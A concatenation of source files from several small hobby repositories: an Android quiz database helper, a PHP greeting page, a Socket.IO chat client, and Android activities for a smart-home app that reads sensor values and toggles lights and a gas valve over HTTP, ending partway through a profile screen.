    public Cursor getRandomQuestions()
    {
        SQLiteDatabase db = getReadableDatabase();
        String MY_QUERY = "SELECT * FROM " + TABLE_QUESTIONS + " where qId NOT LIKE 'CS%' order by RANDOM() limit 50 ";
        Cursor res = db.rawQuery(MY_QUERY, null);
        return res;
    }

    /**
     * Returns up to 50 random non-case-study questions from the selected
     * categories; caller closes the cursor.
     *
     * NOTE(review): the query hard-codes fourteen '?' placeholders, so
     * {@code selectedCategories} must contain exactly 14 entries — confirm
     * against the caller. The 'qId NOT LIKE' / OR precedence also looks
     * suspect (OR binds looser than AND).
     */
    public Cursor getRandomCategoryQuestions(String[] selectedCategories)
    {
        Log.d("Tag","List size is "+selectedCategories[0]);
        SQLiteDatabase db = getReadableDatabase();
        String query = "SELECT * FROM " + TABLE_QUESTIONS + " WHERE qId NOT LIKE 'CS%' and qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? " +
                "OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? " +
                "ORDER BY RANDOM() LIMIT 50";
        Cursor res = db.rawQuery(query, selectedCategories);
        Log.d("tag","Size of Result Set is "+res.getCount());
        return res;
    }

    /** Returns all non-case-study questions of one category; caller closes the cursor. */
    public Cursor getLearningQuestionByCategory(String selectedCategories)
    {
        Log.d("Tag"," Category Selected is "+selectedCategories);
        SQLiteDatabase db = getReadableDatabase();
        Cursor res = db.query(TABLE_QUESTIONS, null, " qTopic = ? and qId NOT LIKE 'CS%' ", new String[]{selectedCategories}, null, null, null);
        Log.d("tag","Size of Result Set is "+res.getCount());
        return res;
    }

    /**
     * Returns the case-study questions (ids starting with "CS") of one
     * category; caller closes the cursor.
     */
    public Cursor getCaseStudyQuestionByCategory(String selectedCategories)
    {
        Log.d("Tag"," Category Selected is "+selectedCategories);
        SQLiteDatabase db = getReadableDatabase();
        Cursor res = db.query(TABLE_QUESTIONS, null, " qTopic = ? and qId LIKE 'CS%' ", new String[] { selectedCategories }, null, null, null);
        Log.d("tag","Size of Result Set is "+res.getCount());
        return res;
    }

    /** Returns the answer options for one question id; caller closes the cursor. */
    public Cursor getAnswersForQuestionId(String qId)
    {
        SQLiteDatabase db = getReadableDatabase();
        Cursor res = db.query(TABLE_ANSWERS , null , "qId = ?", new String[] { qId }, null, null, null);
        Log.d("tag","Size of Result Set is "+res.getCount());
        return res;
    }

    /**
     * Aggregates progress over all completed, visible tests; caller closes
     * the cursor.
     */
    public Cursor getProgress()
    {
        SQLiteDatabase db = getReadableDatabase();
        String MY_QUERY = "select sum(tComplete) as totaltests , sum(totalCorrectAnswers) as correctAnswers , sum(totalWrongAnswers)as wrongAnswers ,\n" +
                "sum(tPass) as totalPass from " + TABLE_TESTS + " where "+ T_ISVISIBLE +" = 1 AND "+ T_COMPLETE + " = 1 " ;
        Cursor res = db.rawQuery(MY_QUERY, null);
        Log.d("tag","Size of Result Set is "+res.getCount());
        return res;
    }

    /** Returns the questions flagged as favourites; caller closes the cursor. */
    public Cursor getFavouriteQuestions()
    {
        SQLiteDatabase db = getReadableDatabase();
        Cursor res = db.query(TABLE_QUESTIONS, null, " qFavourite == 1 ", null, null, null, null);
        Log.d("tag","Size of Result Set is "+res.getCount());
        return res;
    }

    /** Checks sqlite_master for the given table name. */
    public boolean isTableExists(String tableName) {
        SQLiteDatabase db = getReadableDatabase();
        Cursor cursor = db.rawQuery("select DISTINCT tbl_name from sqlite_master where tbl_name = '"+tableName+"'", null);
        if(cursor!=null) {
            if(cursor.getCount()>0) {
                cursor.close();
                return true;
            }
            cursor.close();
        }
        return false;
    }

    /** Returns true if the table has at least one row. */
    public boolean isTableContainsData(String tableName) {
        SQLiteDatabase db = getReadableDatabase();
        String count = "SELECT count(*) FROM "+ tableName;
        Cursor mcursor = db.rawQuery(count, null);
        mcursor.moveToFirst();
        int icount = mcursor.getInt(0);
        mcursor.close(); // fix: the cursor was previously leaked
        if(icount>0) {
            Log.d("Tag"," Number of rows return"+icount);
            return true;
        }
        else {
            //populate table
            Log.d("tag"," No data exist in tables ");
            return false;
        }
    }
}
| a66fee45dfe5ec13b694e4a28ba753d9de9b8192 | [
"Java",
"INI"
] | 7 | Java | Shoaib3008757/XmlParsingTest | f396151fd77d21040cf6dd7a1b071cd37cbe0752 | c4ee06c8c90a301f0eb42dd0709cd1a627690223 |
refs/heads/master | <repo_name>FailingMoon/class<file_sep>/home.php
<html>
<head>
<link rel="stylesheet" href="css/bootstrap.min.css">
</head>
<body>
<div class="text-center">
<?php /* Landing-page greeting rendered server-side. */ echo "This is home";
echo "<br>";?>
<button class="btn btn-danger"><span class="glyphicon glyphicon-user"></span>Yun Che</button>
</div>
</body>
</html> | 86ec9db4668d85b45e12f95a11dadcbc7c32c7f0 | [
"PHP"
] | 1 | PHP | FailingMoon/class | 4676713979221679b19bd7449a348e55eb8bc194 | 9d89c0354ddebd83161b931474295e4ba34f7aaf |
refs/heads/master | <file_sep>var socket = io();
// Log Socket.IO connection lifecycle events for debugging.
socket.on('connect', function() {
    console.log('Conectado al servidor');
});
socket.on('disconnect', function() {
    console.log('Conexión con el servidor perdida');
});
// Sends a chat message to the server, substituting placeholder text when
// either field is empty, and logs the server acknowledgement.
function enviarMensaje(usuario, mensaje) {
    usuario = usuario.length <= 0 ? '<NAME>' : usuario;
    mensaje = mensaje.length <= 0 ? 'Mensaje Vacio' : mensaje;
    var payload = {
        usuario: usuario,
        mensaje: mensaje
    };
    socket.emit('enviarMensaje', payload, function(resp) {
        console.log('Servidor', resp);
    });
}
socket.on('enviarMensaje', function(mensaje) {
console.log('Servidor', mensaje);
}); | 356f27e46ef735fac4603e81a7c0c93db1195be0 | [
"JavaScript"
] | 1 | JavaScript | alfonzzo7/Node_SocketsFundamentos | 4dafe79dcd191f457b21154995d834a19114b534 | d7a5f4b00297920243f6e580239ef88450b0e1fa |
refs/heads/master | <file_sep>package com.example.gihwan.smart_hm;
import android.app.ProgressDialog;
import android.content.ContentValues;
import android.content.DialogInterface;
import android.graphics.Color;
import android.os.AsyncTask;
import android.os.Bundle;
import android.support.annotation.Nullable;
import android.support.v4.widget.SwipeRefreshLayout;
import android.support.v7.app.AlertDialog;
import android.support.v7.app.AppCompatActivity;
import android.util.Log;
import android.view.Gravity;
import android.view.KeyEvent;
import android.view.View;
import android.widget.TextView;
import android.widget.ToggleButton;
import org.json.JSONArray;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
/**
* Created by GiHwan on 2017. 12. 27..
*/
public class ControlActivity extends AppCompatActivity {
    // Status labels and toggle controls, bound in onCreate().
    TextView TMP , Humidity;
    TextView State_Gas , State_Fire;
    ToggleButton tb_living , tb_kitchen,tb_room,tb_gasvalve;
    String LED_State1=""; // stores the received sensor state values
    String LED_State2="";
    String LED_State3="";
    String VALVE_State="";
    String TMP_val =""; // stores the received temperature and humidity values
    String Hum_val ="";
    String Gas_val = ""; // stores the received gas, fire and door values
    String Fire_val = "";
    String Door_val = "";
    private SwipeRefreshLayout refreshLayout_Control;
    @Override
    protected void onCreate(@Nullable Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_control);
        TMP = (TextView)findViewById(R.id.Tmp_r1); // TextView showing the temperature as a number
        Humidity = (TextView)findViewById(R.id.Tmp_r2); // TextView showing the humidity as a number
        State_Gas = (TextView)findViewById(R.id.txt_gas_state); // TextView showing the gas state
        State_Fire = (TextView)findViewById(R.id.txt_fire_state); // TextView showing the fire state
        tb_living = (ToggleButton) findViewById(R.id.switch_L_1); // toggle button - living room
        tb_kitchen = (ToggleButton) findViewById(R.id.switch_L_2); // - kitchen
        tb_room = (ToggleButton) findViewById(R.id.switch_L_3); // - room
        tb_gasvalve = (ToggleButton) findViewById(R.id.switch_G_1); // - gas valve
        // Pull-to-refresh re-reads the sensor values via Control_recv_LED.
        refreshLayout_Control = (SwipeRefreshLayout)findViewById(R.id.swipeRefreshLo);
        refreshLayout_Control.setOnRefreshListener(new SwipeRefreshLayout.OnRefreshListener() {
            @Override
            public void onRefresh() {
                new Control_recv_LED().execute();
                refreshLayout_Control.setRefreshing(false);
            }
        });
        // Initial load of the sensor states.
        new Control_recv_LED().execute();
    }
public void State_ToggleBtn_click(View v){
switch (v.getId()){
case R.id.switch_L_1: // LED 토글버튼 클릭시
if(tb_living.isChecked()){
new Control_send().execute("1",LED_State2,LED_State3,VALVE_State);
LED_State1="1";
}
else{
new Control_send().execute("0",LED_State2,LED_State3,VALVE_State);
LED_State1="0";
}
break;
case R.id.switch_L_2: // LED 토글버튼 클릭시
if(tb_kitchen.isChecked()){
new Control_send().execute(LED_State1,"1",LED_State3,VALVE_State);
LED_State2="1";
}
else{
new Control_send().execute(LED_State1,"0",LED_State3,VALVE_State);
LED_State2="0";
}
break;
case R.id.switch_L_3: // LED 토글버튼 클릭시
if(tb_room.isChecked()){
new Control_send().execute(LED_State1,LED_State2,"1",VALVE_State);
LED_State3="1";
}
else{
new Control_send().execute(LED_State1,LED_State2,"0",VALVE_State);
LED_State3="0";
}
break;
case R.id.switch_G_1: // 가스 토글 버튼 클릭시
if(tb_gasvalve.isChecked()){
new Control_send().execute(LED_State1,LED_State2,LED_State3,"1");
VALVE_State="1";
}
else{
new Control_send().execute(LED_State1,LED_State2,LED_State3,"0");
VALVE_State="0";
}
break;
} }
@Override
public boolean onKeyDown(int keyCode, KeyEvent event) {
// 뒤로 가기 버튼 클릭 시 종료 여부를 물어보기 위하여 생성하였다
switch (keyCode) {
case android.view.KeyEvent.KEYCODE_BACK:
new AlertDialog.Builder(this)
.setTitle("알림")
.setMessage("종료하시겠습니까?")
.setPositiveButton("YES", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
finish();
}
})
.setNegativeButton("NO", null)
.show();
break;
default:
break;
}
return super.onKeyDown(keyCode, event);
}
// LED • 가스 • 화재 • 온도 • 습도 센서의 값을 읽어올 때 처리
public class Control_recv_LED extends AsyncTask<String, Void,String>{
private ProgressDialog progressDialog = new ProgressDialog(ControlActivity.this);
@Override
protected void onPreExecute() {
super.onPreExecute();
// 프로그래스바를 이용
progressDialog.setProgressStyle(ProgressDialog.STYLE_SPINNER);
progressDialog.setMessage("잠시만 기다려 주세요.");
progressDialog.show();
}
@Override
protected void onPostExecute(String res) {
super.onPostExecute(res);
Log.e("모든 LED, 온도, 습도, 가스, 화재 정보를 얻어 온다!", res);
progressDialog.dismiss();
}
@Override
protected String doInBackground(String... sensors) {
try {
for (int i = 0; i < 3; i++) {
progressDialog.setProgress(i * 30);
Thread.sleep(500);
}
} catch (InterruptedException e) {
e.printStackTrace();
}
return getJsonText_LED();
}
}
public String getJsonText_LED() {
StringBuffer sb = new StringBuffer();
try {
String jsonPage = getStringFromUrl("http://52.78.22.237/sensor.php"); // 전등 조작 버튼
String jsonPage_hut = getStringFromUrl("http://52.78.22.237/hutemp.php"); // 온도 습도 조작
String jsonPage_push = getStringFromUrl("http://52.78.22.237/push.php"); // 가스 , 화재 , 문을 알려주기 위한 것 (푸쉬알림)
// 읽어들인 JSON포맷의 데이터를 JSON객체로 변환
JSONObject json_sensor = new JSONObject(jsonPage);
Log.e("json_sensor : ", json_sensor.toString());
JSONObject json_hut = new JSONObject(jsonPage_hut);
Log.e("json_hut : ", json_hut.toString());
JSONObject json_push = new JSONObject(jsonPage_push);
Log.e("json_push : ", json_push.toString());
// 배열로 구성 되어있는 JSON 배열생성
JSONArray jArr_sensor = json_sensor.getJSONArray("sensorData"); // json tag get sensor
JSONArray jArr_hut = json_hut.getJSONArray("hutemp"); // json tag get hutemp
JSONArray jArr_push = json_push.getJSONArray("pushData"); // json tag get pushData
Log.e("JArray_Sensor : ", jArr_sensor.toString());
Log.e("JArray_Hut : ", jArr_hut.toString());
Log.e("jArr_push : ", jArr_push.toString());
if(jArr_sensor.length()!=0){
//배열의 크기만큼 반복하면서, 현재 켜있는 LED의 값을 추출함
for (int i = 0; i < jArr_sensor.length(); i++) {
//i번째 배열 할당
json_sensor = jArr_sensor.getJSONObject(i);
//ksNo,korName의 값을 추출함
LED_State1 = json_sensor.getString("LED1"); // tag 이름 안에 있는 데이터 LED1의 value를 가져온다
LED_State2 = json_sensor.getString("LED2"); // tag 이름 안에 있는 데이터 LED2의 value를 가져온다
LED_State3 = json_sensor.getString("LED3"); // tag 이름 안에 있는 데이터 LED3의 value를 가져온다
VALVE_State = json_sensor.getString("VALVE"); // tag 이름 안에 있는 데이터 VALVE의 value를 가져온다
Log.e("LED 1: " ,LED_State1);
Log.e("LED 2: " ,LED_State2);
Log.e("LED 3: " ,LED_State3);
Log.e("LED 4: " ,VALVE_State);
runOnUiThread(new Runnable() {
@Override
public void run() {
if(LED_State1.equals("1")){
tb_living.setChecked(true);
}
if(LED_State2.equals("1")){
tb_kitchen.setChecked(true);
}
if(LED_State3.equals("1")){
tb_room.setChecked(true);
}
if(VALVE_State.equals("1")){
tb_gasvalve.setChecked(true);
}
if(LED_State1.equals("0")){
tb_living.setChecked(false);
}
if(LED_State2.equals("0")){
tb_kitchen.setChecked(false);
}
if(LED_State3.equals("0")){
tb_room.setChecked(false);
}
if(VALVE_State.equals("0")){
tb_gasvalve.setChecked(false);
}
}});
sb.append("[ " + LED_State1 + " ]\n");
sb.append("[" + LED_State2 + "]\n");
sb.append("[" + LED_State3 + "]\n");
sb.append("[" + VALVE_State + "]\n");
sb.append("\n");
}
}
if(jArr_hut.length() !=0){ // 온도, 습도의 데이터가 있는지 없는지 확인 한다
//배열의 크기만큼 반복하면서, 현재 켜있는 온도의 값을 추출함
for (int i = 0; i < jArr_hut.length(); i++) {
//i번째 배열 할당
json_hut = jArr_hut.getJSONObject(i);
//Temp,Humidity의 값을 추출함
TMP_val = json_hut.getString("temp");
Hum_val = json_hut.getString("hu");
Log.e("temp: " ,TMP_val);
Log.e("hu: " ,Hum_val);
runOnUiThread(new Runnable() {
@Override
public void run() {
TMP.setText(TMP_val+" 도");
TMP.setGravity(Gravity.CENTER);
Humidity.setText(Hum_val+" 도");
Humidity.setGravity(Gravity.CENTER);
}});
sb.append("[" + TMP_val + "]\n");
sb.append("[" + Hum_val + "]\n");
sb.append("\n");
}
}
if(jArr_push.length() !=0){ // 가스 , 화재 , 문 데이터가 있는지 없는지 확인 한다
//배열의 크기만큼 반복하면서, 현재의 가스 , 화재 , 문의 데이터를 추출하기 위함
for (int i = 0; i < jArr_push.length(); i++) {
//i번째 배열 할당
json_push = jArr_push.getJSONObject(i);
//Temp,Humidity의 값을 추출함
Gas_val = json_push.getString("GAS");
Fire_val = json_push.getString("FIRE");
Door_val = json_push.getString("DOOR");
Log.e("gas: " ,Gas_val);
Log.e("fire: " ,Fire_val);
Log.e("door: " ,Door_val);
runOnUiThread(new Runnable() {
@Override
public void run() {
if(Gas_val.equals("1")){
State_Gas.setText("가스가 누출 되었습니다.");
State_Gas.setTextColor(Color.RED);
}
if(Fire_val.equals("1")){
State_Fire.setText("화재 위험이 감지되었습니다.");
State_Fire.setTextColor(Color.RED);
}
if(Gas_val.equals("0")){
State_Gas.setText("현재 가스는 안전합니다.");
State_Gas.setTextColor(Color.parseColor("#388E3C"));
}
if(Fire_val.equals("0")){
State_Fire.setText("현재 화재는 안전합니다.");
State_Fire.setTextColor(Color.parseColor("#388E3C"));
}
}});
sb.append("[" + Gas_val + "]\n");
sb.append("[" + Fire_val + "]\n");
sb.append("[" + Door_val + "]\n");
sb.append("\n");
}
}
} catch (Exception e){
e.printStackTrace();
}
return sb.toString();
}
public String getStringFromUrl(String pUrl) {
BufferedReader bufreader = null;
HttpURLConnection urlConnection = null;
StringBuffer page = new StringBuffer(); //읽어온 데이터를 저장할 StringBuffer객체 생성
try {
URL url = new URL(pUrl);
urlConnection = (HttpURLConnection) url.openConnection();
InputStream contentStream = urlConnection.getInputStream();
bufreader = new BufferedReader(new InputStreamReader(contentStream, "UTF-8"));
String line = null;
//버퍼의 웹문서 소스를 줄단위로 읽어(line), Page에 저장함
while ((line = bufreader.readLine()) != null) {
Log.d("my_data:", line);
page.append(line);
}
} catch (IOException e) {
e.printStackTrace();
} finally {
//자원해제
try {
bufreader.close();
urlConnection.disconnect();
} catch (IOException e) {
e.printStackTrace();
}
}
return page.toString();
} // getStringFromUrl : 주어진 URL의 문서의 내용을 문자열로 반환
// LED 버튼을 제어 할 값을 보낼 때 처리
public class Control_send extends AsyncTask<String, Void,String>{
private ProgressDialog progressDialog = new ProgressDialog(ControlActivity.this);
@Override
protected void onPreExecute() {
super.onPreExecute();
progressDialog.setProgressStyle(ProgressDialog.STYLE_SPINNER);
progressDialog.setMessage("잠시만 기다려 주세요.");
progressDialog.show();
}
@Override
protected void onPostExecute(String res) {
super.onPostExecute(res);
Log.e("내가 버튼 제어할 정보를 보여준다", res);
progressDialog.dismiss();
}
@Override
protected String doInBackground(String... params) {
try {
for (int i = 0; i < 3; i++) {
progressDialog.setProgress(i * 30);
Thread.sleep(500);
}
} catch (InterruptedException e) {
e.printStackTrace();
}
String LED1 = params[0];
String LED2 = params[1];
String LED3 = params[2];
String VALVE = params[3];
Log.e("내가 전송하는 값 : " , LED1+LED2+LED3+VALVE);
String server_URL = "http://172.16.58.3/sensor.php";
String postParameters = "LED1="+LED1 + "&LED2="+LED2+"&LED3="+LED3+"&VALVE="+VALVE;
try {
URL url = new URL(server_URL+"?"+postParameters);
HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
httpURLConnection.setReadTimeout(5000);
httpURLConnection.setConnectTimeout(5000);
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoInput(true);
httpURLConnection.connect();
OutputStream outputStream = httpURLConnection.getOutputStream();
outputStream.write(postParameters.getBytes("UTF-8"));
outputStream.flush();
outputStream.close();
int responseStatusCode = httpURLConnection.getResponseCode();
Log.d(ContentValues.TAG, "POST response code - " + responseStatusCode);
InputStream inputStream;
if (responseStatusCode == HttpURLConnection.HTTP_OK) {
inputStream = httpURLConnection.getInputStream();
} else {
inputStream = httpURLConnection.getErrorStream();
}
/* 서버 -> 안드로이드 파라메터값 전달 */
InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "UTF-8");
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
StringBuilder sb = new StringBuilder();
String line = null;
while ((line = bufferedReader.readLine()) != null) {
sb.append(line);
}
bufferedReader.close();
return sb.toString();
} catch (Exception e) {
Log.d(ContentValues.TAG, "RecvData: Error ", e);
return new String("Error: " + e.getMessage());
}
}
}
}<file_sep>package com.example.gihwan.smart_hm;
import android.app.Dialog;
import android.content.Context;
import android.support.annotation.NonNull;
import android.view.Window;
/**
* Created by GiHwan on 2018. 1. 8..
*/
/**
 * Minimal progress dialog: a stock {@link Dialog} with the default title bar
 * removed and a custom layout (R.layout.custom_dialog) as its content.
 */
public class CustomProgressDialog extends Dialog{
    public CustomProgressDialog(@NonNull Context context) {
        super(context);
        requestWindowFeature(Window.FEATURE_NO_TITLE); // drop the (ugly) default title bar
        setContentView(R.layout.custom_dialog); // layout used as the dialog body
    }
}
<file_sep>package com.example.gihwan.smart_hm;
import android.app.Activity;
import android.content.DialogInterface;
import android.graphics.Color;
import android.os.Bundle;
import android.support.v4.widget.SwipeRefreshLayout;
import android.support.v7.app.AlertDialog;
import android.view.KeyEvent;
import android.view.View;
import com.github.mikephil.charting.animation.Easing;
import com.github.mikephil.charting.charts.BarChart;
import com.github.mikephil.charting.charts.PieChart;
import com.github.mikephil.charting.data.BarData;
import com.github.mikephil.charting.data.BarDataSet;
import com.github.mikephil.charting.data.BarEntry;
import com.github.mikephil.charting.data.Entry;
import com.github.mikephil.charting.data.PieData;
import com.github.mikephil.charting.data.PieDataSet;
import com.github.mikephil.charting.formatter.PercentFormatter;
import com.github.mikephil.charting.highlight.Highlight;
import com.github.mikephil.charting.interfaces.datasets.IBarDataSet;
import com.github.mikephil.charting.listener.OnChartValueSelectedListener;
import com.github.mikephil.charting.utils.ColorTemplate;
import java.util.ArrayList;
/**
* Created by GiHwan on 2017. 12. 27..
*/
/**
 * Usage-statistics screen. Renders a pie chart of electricity/gas usage per
 * area and a bar chart of monthly temperature/humidity, toggled by two
 * buttons. Chart values are currently hard-coded demo data.
 */
public class ChartActivity extends Activity {
    PieChart pieChart_LED;   // electricity / gas usage per area
    BarChart BarData_Feel;   // monthly temperature / humidity
    private SwipeRefreshLayout refreshLayout_Chart; // pull-to-refresh: hides both charts
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_chart);
        pieChart_LED = (PieChart) findViewById(R.id.piechart_LED);   // LED usage chart
        BarData_Feel = (BarChart) findViewById(R.id.barchart_feel);  // temperature usage chart
        refreshLayout_Chart = (SwipeRefreshLayout) findViewById(R.id.swipeRefreshChart);
        refreshLayout_Chart.setOnRefreshListener(new SwipeRefreshLayout.OnRefreshListener() {
            @Override
            public void onRefresh() {
                // "Refresh" simply hides both charts until a button is pressed again.
                refreshLayout_Chart.setRefreshing(false);
                pieChart_LED.setVisibility(View.INVISIBLE);
                BarData_Feel.setVisibility(View.INVISIBLE);
            }
        });
    }
    /**
     * Configures and populates the usage pie chart (percent mode, four slices:
     * living room / kitchen / room / gas valve) and attaches a tap listener
     * that shows the tapped slice's value in a Snackbar.
     */
    private void setupPieChart_LED() {
        pieChart_LED.setUsePercentValues(true);
        pieChart_LED.setExtraOffsets(5, 10, 5, 5);
        pieChart_LED.setDragDecelerationFrictionCoef(0.95f);
        pieChart_LED.setDrawHoleEnabled(false);
        pieChart_LED.setHoleColor(Color.WHITE);
        pieChart_LED.setTransparentCircleRadius(61f);
        // Hard-coded demo values, one Entry per slice.
        ArrayList<Entry> yValues = new ArrayList<Entry>();
        yValues.add(new Entry(34f, 0));
        yValues.add(new Entry(23f, 1));
        yValues.add(new Entry(14f, 2));
        yValues.add(new Entry(35f, 3));
        PieDataSet dataSet_LED = new PieDataSet(yValues, "");
        dataSet_LED.setValueTextSize(15);
        dataSet_LED.setSliceSpace(3f);
        dataSet_LED.setSelectionShift(5f);
        dataSet_LED.setColors(ColorTemplate.COLORFUL_COLORS);
        // Slice labels (living room / kitchen / room / gas valve).
        final ArrayList<String> xVals = new ArrayList<String>();
        xVals.add("거실");
        xVals.add("부엌");
        xVals.add("방");
        xVals.add("가스벨브");
        pieChart_LED.animateY(1000, Easing.EasingOption.EaseInOutExpo); // entry animation
        PieData data = new PieData(xVals, dataSet_LED);
        data.setValueFormatter(new PercentFormatter());
        data.setValueTextColor(Color.WHITE);
        pieChart_LED.setData(data);
        pieChart_LED.setDescription("가스 • 전기 사용량");
        pieChart_LED.setDescriptionTextSize(18f);
        pieChart_LED.setOnChartValueSelectedListener(new OnChartValueSelectedListener() {
            @Override
            public void onValueSelected(Entry e, int dataSetIndex, Highlight h) {
                // Show the tapped slice's raw value in a Snackbar.
                // NOTE(review): switching on dataSetIndex (there is only one data
                // set) rather than e.getXIndex() looks suspicious - confirm taps on
                // all four slices actually reach the intended case.
                switch (dataSetIndex) {
                    case 0:
                        com.nispok.snackbar.Snackbar.with(getApplicationContext())
                                .text("총 거실의 전기 사용량은 : " + e.getVal() + " 입니다.")
                                .show(ChartActivity.this);
                        break;
                    case 1:
                        com.nispok.snackbar.Snackbar.with(getApplicationContext())
                                .text("총 부엌의 전기 사용량은 : " + e.getVal() + " 입니다.")
                                .show(ChartActivity.this);
                        break;
                    case 2:
                        com.nispok.snackbar.Snackbar.with(getApplicationContext())
                                .text("총 방의 전기 사용량은 : " + e.getVal() + " 입니다.")
                                .show(ChartActivity.this);
                        break;
                    case 3:
                        com.nispok.snackbar.Snackbar.with(getApplicationContext())
                                .text("총 가스벨브의 사용량은 : " + e.getVal() + " 입니다.")
                                .show(ChartActivity.this);
                        break;
                }
            }
            @Override
            public void onNothingSelected() {
            }
        });
        pieChart_LED.setData(data);
        pieChart_LED.invalidate();
    }
    /**
     * Configures and populates the monthly temperature/humidity bar chart
     * (two series over five month labels; values are hard-coded demo data).
     */
    private void setupBarChart_Val() {
        ArrayList<String> month = new ArrayList<String>();
        month.add("1월");
        month.add("2월");
        month.add("3월");
        month.add("4월");
        month.add("5월");
        //month.add("6월");
        ArrayList<BarEntry> bar_Tmp = new ArrayList<>(); // temperature series
        bar_Tmp.add(new BarEntry(8, 0));
        bar_Tmp.add(new BarEntry(2, 1));
        bar_Tmp.add(new BarEntry(15, 2));
        bar_Tmp.add(new BarEntry(20, 3));
        //bar_Tmp.add(new BarEntry(5, 4));
        ArrayList<BarEntry> bar_Hmi = new ArrayList<>(); // humidity series
        bar_Hmi.add(new BarEntry(16, 0));
        bar_Hmi.add(new BarEntry(14, 1));
        bar_Hmi.add(new BarEntry(5, 2));
        bar_Hmi.add(new BarEntry(20, 3));
        //bar_Tmp.add(new BarEntry(5, 4));
        BarDataSet TMP_set = new BarDataSet(bar_Tmp, "온도");
        TMP_set.setColor(Color.rgb(244, 67, 54));
        TMP_set.setDrawValues(true);
        BarDataSet Humidity_set = new BarDataSet(bar_Hmi, "습도");
        Humidity_set.setColor(Color.rgb(255, 235, 59));
        Humidity_set.setDrawValues(true);
        ArrayList<IBarDataSet> dataSets_bar = new ArrayList<>();
        dataSets_bar.add(TMP_set);
        dataSets_bar.add(Humidity_set);
        BarData feel_data = new BarData(month, dataSets_bar);
        BarData_Feel.setData(feel_data); // initialize the Bardata with argument labels and dataSet
        BarData_Feel.animateY(2000);
        BarData_Feel.setDescription("온도,습도 사용량");
        BarData_Feel.setDescriptionTextSize(10f);
        // BarData_Feel.getLegend().setEnabled(false);
        BarData_Feel.invalidate();
    }
    /** Chart-selector buttons: show one chart, hide the other. */
    public void Chart_Btn_Click(View v) {
        switch (v.getId()) {
            case R.id.LED_chart:
                setupPieChart_LED();
                pieChart_LED.setVisibility(View.VISIBLE);
                BarData_Feel.setVisibility(View.INVISIBLE);
                break;
            case R.id.grpah_show:
                setupBarChart_Val();
                BarData_Feel.setVisibility(View.VISIBLE);
                pieChart_LED.setVisibility(View.INVISIBLE);
                break;
        }
    }
    @Override
    public boolean onKeyDown(int keyCode, KeyEvent event) { // ask for confirmation on back press
        switch (keyCode) {
            case android.view.KeyEvent.KEYCODE_BACK:
                new AlertDialog.Builder(this)
                        .setTitle("알림")
                        .setMessage("종료하시겠습니까?")
                        .setPositiveButton("YES", new DialogInterface.OnClickListener() {
                            @Override
                            public void onClick(DialogInterface dialog, int which) {
                                finish();
                            }
                        })
                        .setNegativeButton("NO", null)
                        .show();
                break;
            default:
                break;
        }
        return super.onKeyDown(keyCode, event);
    }
}<file_sep>package com.example.gihwan.smart_hm;
import android.app.Activity;
import android.app.ProgressDialog;
import android.content.ContentValues;
import android.content.DialogInterface;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.support.annotation.Nullable;
import android.support.v7.app.AlertDialog;
import android.text.InputFilter;
import android.text.Spanned;
import android.text.method.ScrollingMovementMethod;
import android.util.Log;
import android.view.KeyEvent;
import android.view.View;
import android.widget.EditText;
import android.widget.TextView;
import com.google.gson.Gson;
import com.kakao.kakaolink.KakaoLink;
import com.kakao.kakaolink.KakaoTalkLinkMessageBuilder;
import com.kakao.util.KakaoParameterException;
import org.json.JSONArray;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.regex.Pattern;
import static android.content.ContentValues.TAG;
/**
* Created by GiHwan on 2017. 12. 27..
*/
public class MypageActivity extends Activity {
private KakaoLink kakaoLink; // 카카오톡 메신저를 사용하기 위해 선언해놓은 변수
EditText Mypage_PN;
TextView Mypage_ID,Mypage_CODE; // 입력한 코드 번호를 공유하기 위해 선언해놓은 변수
EditText Mypage_PW1, Mypage_PW2, Mypage_NAME;
TextView Mypage_ADDR_Show;
private String str = ""; // 주소 값을 전달 받아 수정하기 위함
private String usr_id = ""; // 사용자의 값을 전달 하기 위함
private String usr_code = "";
String usr_id_recv = ""; // 인텐트로 값을 전달 받기 위함
String usr_code_recv = "";
private String usr_id_json = ""; //json으로 받은 값을 사용하기 위함
private String usr_pw_json = "";
private String usr_pw_r_json = "";
private String usr_name_json = "";
private String usr_addr_json = "";
private String usr_phone_json = "";
private String usr_code_json = "";
@Override
protected void onCreate(@Nullable Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_mypage);
Mypage_ID = (TextView) findViewById(R.id.Mypage_Id);
Mypage_PW1 = (EditText) findViewById(R.id.Mypage_Pw1);
Mypage_PW2 = (EditText) findViewById(R.id.Mypage_Pw2);
Mypage_NAME = (EditText) findViewById(R.id.Mypage_Name);
Mypage_ADDR_Show = (TextView) findViewById(R.id.Mypage_Addr_Show);
Mypage_PN = (EditText) findViewById(R.id.Mypage_Pn);
Mypage_CODE = (TextView) findViewById(R.id.Mypage_Code);
try {
Intent intent_I = getIntent();
usr_id_recv = intent_I.getStringExtra("usr_id_recv");
usr_code_recv = intent_I.getStringExtra("usr_code_recv");
Log.e("usr_id_recv_Mypage", usr_id_recv);
Log.e("usr_code_recv_Mypage", usr_code_recv);
kakaoLink = KakaoLink.getKakaoLink(MypageActivity.this);
Mypage_PW1.setFilters(new InputFilter[] {filter_mypage}); // 입력할 때 데이터 베이스에 효율적으로 접근하기 위해 영어만 입력하도록 함
Mypage_PW2.setFilters(new InputFilter[] {filter_mypage}); // 입력할 때 데이터 베이스에 효율적으로 접근하기 위해 영어만 입력하도록 함
// 만들어놓은 Select_Login를 선언 및 실행
